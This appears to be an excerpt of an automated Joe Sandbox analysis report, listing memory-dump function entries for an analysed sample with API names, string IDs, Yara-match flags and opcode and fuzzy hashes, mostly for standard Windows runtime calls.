                      • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: .$GetProcAddress.$l
                      • API String ID: 0-2784972518
                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction ID: 25c07b4df250cc591a60015adfc3b3f30e6c5af78002851d15ca102c04993424
                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                      • Instruction Fuzzy Hash: D9316CB6910609DFEB10CF99C880AAEBBF9FF88328F14405AD541A7310D771FA45CBA4
                      APIs
                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,BBD3FB9F), ref: 00410837
                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID:
                      • API String ID: 1518329722-0
                      • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                      • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                      • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: -rR($?Onx
                      • API String ID: 0-1712884891
                      • Opcode ID: 25fcc91576eed7d14f1945048e1d0f5a3008f26bd8202700872679643a3ff551
                      • Instruction ID: 79846acbf4e7b5690a522b84a021a8d4fc9da77c85cc087af72a7ad17fe2a3d4
                      • Opcode Fuzzy Hash: 25fcc91576eed7d14f1945048e1d0f5a3008f26bd8202700872679643a3ff551
                      • Instruction Fuzzy Hash: 4B6127F3B182009BF3086E2DDC8577AB7D6EBC4320F1A463DDB8993784E93958018696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: rU
                      • API String ID: 0-3336436004
                      • Opcode ID: b3504efbe0036544ec1acf7a9b9e54a12e6685dbad243575ce347c27e668c359
                      • Instruction ID: 747fe20da9bc05e0f2843beb898598db8f6897cf113ff3cfcff745163d18f09a
                      • Opcode Fuzzy Hash: b3504efbe0036544ec1acf7a9b9e54a12e6685dbad243575ce347c27e668c359
                      • Instruction Fuzzy Hash: 841238F350C304AFE3086E29EC4567AFBE9EB94720F1A4A3DEAD5C3744EA3558018756
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04955990,?,?,00000008,?,?,0495C8F1,00000000), ref: 04955BC2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6a92360c6ed593a8163160f57951f5ff22a9c40d74ee45768f7a554f177bb73f
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 71B11D31610608EFD715CF28C48AB657BE1FF45364F268668E899CF2B6D335E991CB40
                      APIs
                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionRaise
                      • String ID:
                      • API String ID: 3997070919-0
                      • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                      • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                      • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                      • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                      • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                      • Instruction ID: 80a742d2028110a4717a83176bcca929440e393f43cacecb4665b054b58c6b9a
                      • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                      • Instruction Fuzzy Hash: 21418775805219AFDF20DFA9CC88AEABBBDEF45304F2441E9E81DD3210D635AE458F60
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                      • Instruction ID: 0da0f6d43ac66bea4d05f4cd5f3fcaee254ac53de518b98f89be5a9909b1102a
                      • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                      • Instruction Fuzzy Hash: 7B41B4B5C0421CAEDF20DF69CC89AEABBB8AF44304F1442DEE419D3241DA389E85CF54
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction ID: b5095156a5f690e3642485833f0ac53df0a1c405d01f16cdc1e8a54bfb3d9efb
                      • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                      • Instruction Fuzzy Hash: C1C10134A006478FDB28CF68C594E7ABBBAFFC5304F144A39D4529BA98D730B945CB60
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction ID: a862614980e7782cfb360a41e62bb903fc37a91afa162c473b4857922a947482
                      • Opcode Fuzzy Hash: 8470d482166b29df0f0bdf2b707670bb0d2149d7074c5d4c6b8b9bc3646ec2c9
                      • Instruction Fuzzy Hash: DDC1EE309006079ECB34CE69C584A7BBBB1AB45304F144A7FD856B7BD2C339AD0ACB59
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction ID: fa01a4797d1f63c394b1f7f654db9bb519510f43bc4b30c868f50a83e00bf471
                      • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                      • Instruction Fuzzy Hash: F0B18F71A0060B8BDF24CF68C958EBEBBA9FFC4304F140A79D59297694D731BA41CB61
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction ID: c83ad001e3c04e1f23fe5313526111bf351830610e2bf169758c16327f184a9c
                      • Opcode Fuzzy Hash: 0c5b649a34a28a7901ced7402a87d0ab1891e4bc7ca1eda254f1c36e1c86cddc
                      • Instruction Fuzzy Hash: 3EB1E47090460B8BDB248E6AC555ABFB7A1AF41304F140E3FD452B77C1C73EAD268B89
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID: l
                      • API String ID: 0-2517025534
                      • Opcode ID: 041e995513071af677990e4e1143d78a093c717db1e527a5d5acdfb2364982f5
                      • Instruction ID: 80c78eb767583b2a25c92f62957132076a0ec1ea736585b92347e1ab35decde6
                      • Opcode Fuzzy Hash: 041e995513071af677990e4e1143d78a093c717db1e527a5d5acdfb2364982f5
                      • Instruction Fuzzy Hash: 63818BB3F1112547F3644D28CCA836266939BA5324F3F82798E9D6B7C5E93E5C0A53C4
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(0040A72C,0494A30B), ref: 0494A98C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000A72C,0040A0A4), ref: 0040A725
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction ID: 2e9130e8fabf2091f020550841097bdee3684dee1eb7d8ffdadd4873c3d8fa43
                      • Opcode Fuzzy Hash: f7f15cac9e9bf66a9e2158eab73941a450ed06a429c5457dfeeb9365a06e4f3f
                      • Instruction Fuzzy Hash:
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction ID: 3c2d4b823819c0ef79fadcf046fefbcb2a87197a19d2065c9f8a0fe70da1ab12
                      • Opcode Fuzzy Hash: 7769912fe868597113bc2185a5bbbb46458ecd65f2a9e081601031a621f49aa8
                      • Instruction Fuzzy Hash: 80A02230B00200CF83208F32EE0830C3EF8FB8C2C0300C038A000C0232EB3880828B08
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction ID: 2119cb9e33fec53289003fbb8559c0bd9e138a5c3f232e450aa7d4159409e329
                      • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                      • Instruction Fuzzy Hash: 91320331E29F014DD7239A34D922336A649AFB73D4F56D737E819B5AA9EF28C4C34108
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a3bce8d9d21c66108ab0b7d3082d5403f4f1fd3df21b405bebc1e491d6af9186
                      • Instruction ID: affea146308bd21a2d3fe8175c3ab1cc6f28d84fd5c3b880d276b43b5cbd0736
                      • Opcode Fuzzy Hash: a3bce8d9d21c66108ab0b7d3082d5403f4f1fd3df21b405bebc1e491d6af9186
                      • Instruction Fuzzy Hash: AC515EB250811E9FDB21CF24C5401EF3BA1EB56362F34C02BD84987A41D37A4E17EA9E
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5fe6fc5ecf26c025115b89b2a35fdb2f0d1cde9dc8939ac68aa749d605309f15
                      • Instruction ID: 6351d2fc5d6baa9902321f587f25a7a5170b5054951892fcf7be59a2ba45daa4
                      • Opcode Fuzzy Hash: 5fe6fc5ecf26c025115b89b2a35fdb2f0d1cde9dc8939ac68aa749d605309f15
                      • Instruction Fuzzy Hash: C971BFF3F1112647F3544939CD583A166939BD2324F2F42788F5C6BBC5E97E4D0A6288
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d5e4807c8a3368373eff35d2c3ba732129111b920281cc8dc46cedf19ce93b4b
                      • Instruction ID: 469bfd461bb50847dc519f101d8e1c8120ca04b759066b8bfda27f6e6b99b6e1
                      • Opcode Fuzzy Hash: d5e4807c8a3368373eff35d2c3ba732129111b920281cc8dc46cedf19ce93b4b
                      • Instruction Fuzzy Hash: EB515DF39085108BE3006E2CDC5576AB7E6EF94720F1B892DEAC5D3744E9358845C7C2
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4b0f63741f5cc1f635e3187dd2446e90507181670ebe09b6f0c652189ddf23f0
                      • Instruction ID: 42156322980c1bd1773421d396cc48983ff7d2e8a08edef940d8a77b2a72ae5f
                      • Opcode Fuzzy Hash: 4b0f63741f5cc1f635e3187dd2446e90507181670ebe09b6f0c652189ddf23f0
                      • Instruction Fuzzy Hash: 9B512AF3A082044BE3446E7DDC9573BB6D6ABE4320F5A863D9B86D33C4F97598064286
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a995b58179b35eae7a4afbf082ec4f8f8d9b0663cf18cfa0c97385a2e73e04a5
                      • Instruction ID: 33531d40a9a3a4c6a0ec032cd9d10f97c7738953c7994d16ae88e612bb9a2435
                      • Opcode Fuzzy Hash: a995b58179b35eae7a4afbf082ec4f8f8d9b0663cf18cfa0c97385a2e73e04a5
                      • Instruction Fuzzy Hash: A45128B3B0C1046FF319591AEC45BBBB79BDBC4330F2AC13EE68193748D93A58064696
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F9000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f9000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 671134a5f0ae57437e06a67170d91840f0151b90c8ec1c982481ef4e6251892d
                      • Instruction ID: 4aaeef5ae34a85ad1e6d337daa2bf6c5f7bdd46d51165e367e3a4679ce31dc5f
                      • Opcode Fuzzy Hash: 671134a5f0ae57437e06a67170d91840f0151b90c8ec1c982481ef4e6251892d
                      • Instruction Fuzzy Hash: 4951F5B390C614DFD3006E29D8806BAFBE7EB94354F2A452DD5C687704E6355982EB83
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3fc3ad2e6f20feb2771a0d77fff123a1224ef77451555be1b0c0000c9cddfa86
                      • Instruction ID: b5f68d58a424befbc09e837e50dc9cc9bb2a6f778cf5b56706e127b5342590df
                      • Opcode Fuzzy Hash: 3fc3ad2e6f20feb2771a0d77fff123a1224ef77451555be1b0c0000c9cddfa86
                      • Instruction Fuzzy Hash: F751AFB3F1102547F3544939CD183A16693DBD5320F2F82788F9C6BBD9D87E5D0A6288
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2efa30ad9198466f7438ef251b118c18b024ee10b67b405349c0ab16f8fbe5dd
                      • Instruction ID: 97c1ff55b5c714025d1096ef9b2d668eea180e0867616f272ff4c6cc565b3949
                      • Opcode Fuzzy Hash: 2efa30ad9198466f7438ef251b118c18b024ee10b67b405349c0ab16f8fbe5dd
                      • Instruction Fuzzy Hash: D3418BF3A086144FE3046E29DC4577AB7E6FFD0320F2B863DCAD583744E83508028686
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dbef5d7bef59b43be5dfa8edd5703d8ccb9a77abc700a4ce04d59e9719422d3f
                      • Instruction ID: 4f991775fd075f8e442a30bf71a6a0abb8bd3355318921d4ba1c8722690bbe59
                      • Opcode Fuzzy Hash: dbef5d7bef59b43be5dfa8edd5703d8ccb9a77abc700a4ce04d59e9719422d3f
                      • Instruction Fuzzy Hash: E74106F3D046145BE344AE2CCC4536ABAD6AB64710F1B453C9FC8D3780EA7D990487C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: dc73e0da1c097c42129b8bd368551c9eeef649b30d4240c0eb39a7d2c49c9dd8
                      • Instruction ID: 0a5ecd0bcd589ae5c5a198e7f216788362b8199b10ceada31136a7f7796fccf0
                      • Opcode Fuzzy Hash: dc73e0da1c097c42129b8bd368551c9eeef649b30d4240c0eb39a7d2c49c9dd8
                      • Instruction Fuzzy Hash: B74152B3F112264BF3544939CD583A265839BD5311F2F82788B4CABBC9D87E9C0A5388
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cc6edaedf4e213ac50b3d70a713bb6229f104d50b48382c5bb92e6d842ece600
                      • Instruction ID: cabdfe5584b24cf45efc7144704cdbcb7e4788fe998356dc4fe4bec9e6164b13
                      • Opcode Fuzzy Hash: cc6edaedf4e213ac50b3d70a713bb6229f104d50b48382c5bb92e6d842ece600
                      • Instruction Fuzzy Hash: AD4107F3E186144FE308AE38CC5573ABBD6EB94310F17863DDAC597788E93858058786
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_470000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 01582404b4d2c2ede1d9a33a93a86e7fa08d83f64a716f04567e726049ee32f7
                      • Instruction ID: b67df950e62a6892fd4607e841d797f97a02fa90efffa398d6723887ec454862
                      • Opcode Fuzzy Hash: 01582404b4d2c2ede1d9a33a93a86e7fa08d83f64a716f04567e726049ee32f7
                      • Instruction Fuzzy Hash: 774123F3B582045BF348693CDD6937A76D6CB90320F1E463EEA86C77C4EC3998094256
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: fa6b4651d7221cff094baf480b42453b6c69c455708c8eaf66ed9c9ed1b57600
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: E6112B7720014243DA598AFED4B4EB6F79DEFC5329B2C477AD0858B75AE122F144E600
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453741215.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: 8a5cd3a7b95f6d1cedb65045da1f90a52a61a6071a3ad4ec5084ba056dedaf80
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: DC117072350100DFDB58DE55EC90FA673EAEB89620B1D8056E904CB315E675EC01C760
                      Memory Dump Source
                      • Source File: 00000000.00000002.4452325212.00000000006FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 006FA000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_6fa000_file.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bb66d49b8d920b6dc757a4e6732170c6e5a3c9dd37fcf2de5c74cf024db9d879
                      • Instruction ID: 32663fe22704bb70b5c1d01a85cb45771ff41330a53144533dff5a1cac0bd739
                      • Opcode Fuzzy Hash: bb66d49b8d920b6dc757a4e6732170c6e5a3c9dd37fcf2de5c74cf024db9d879
                      • Instruction Fuzzy Hash: D9F02EF628820FBDB201C645D675976B76FFA53374730A069F702C5001E3A09505B634
                      Memory Dump Source
                      • Source File: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction ID: 2429803e5c0a4337ea3c502ce323077035bac9e0c6282ea3a7e09db8bb15e051
                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                      • Instruction Fuzzy Hash: 6201A276A006149FDF21CF24CC08FAB33F9EFC6216F4544B5EA0A9B281E774B9458B90
                      APIs
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                      • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                      • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                      Strings
                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                      • kernel32.dll, xrefs: 00409C00
                      • WakeAllConditionVariable, xrefs: 00409C1D
                      • SleepConditionVariableCS, xrefs: 00409C11
                      Memory Dump Source
